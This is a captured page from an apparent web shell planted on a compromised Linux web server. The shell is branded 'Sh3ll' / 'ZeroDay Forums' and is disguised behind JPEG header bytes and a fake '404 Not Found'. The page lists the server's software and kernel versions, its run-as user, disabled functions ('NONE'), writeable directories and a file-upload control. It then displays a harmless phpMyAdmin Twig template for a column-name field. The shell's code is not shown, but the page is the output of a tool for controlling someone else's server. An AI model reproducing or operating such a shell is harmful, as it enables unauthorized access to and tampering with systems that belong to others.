����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/root/usr/share/phpMyAdmin/templates/columns_definitions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/usr/share/phpMyAdmin/templates/columns_definitions/column_name.twig
{% set title = '' %}
{% if column_meta['column_status'] is defined %}
    {% if column_meta['column_status']['isReferenced'] %}
        {% set title = title ~ 'Referenced by %s.'|trans|format(
            column_meta['column_status']['references']|join(',')
        ) %}
    {% endif %}
    {% if column_meta['column_status']['isForeignKey'] %}
        {% if title is not empty %}
            {% set title = title ~ '\n'|raw %}
        {% endif %}
        {% set title = title ~ 'Is a foreign key.'|trans %}
    {% endif %}
{% endif %}
{% if title is empty %}
    {% set title = 'Column'|trans %}
{% endif %}

<input id="field_{{ column_number }}_{{ ci - ci_offset }}"
    {% if column_meta['column_status'] is defined
        and not column_meta['column_status']['isEditable'] %}
        disabled="disabled"
    {% endif %}
    type="text"
    name="field_name[{{ column_number }}]"
    maxlength="64"
    class="textfield"
    title="{{ title }}"
    size="10"
    value="{{ column_meta['Field'] is defined ? column_meta['Field'] }}">

{% if cfg_relation['centralcolumnswork']
    and not (column_meta['column_status'] is defined
        and not column_meta['column_status']['isEditable']) %}
    <p class="column_name" id="central_columns_{{ column_number }}_{{ ci - ci_offset }}">
        <a data-maxrows="{{ max_rows }}"
            href="#"
            class="central_columns_dialog">
            {% trans 'Pick from Central Columns' %}
        </a>
    </p>
{% endif %}

ZeroDay Forums Mini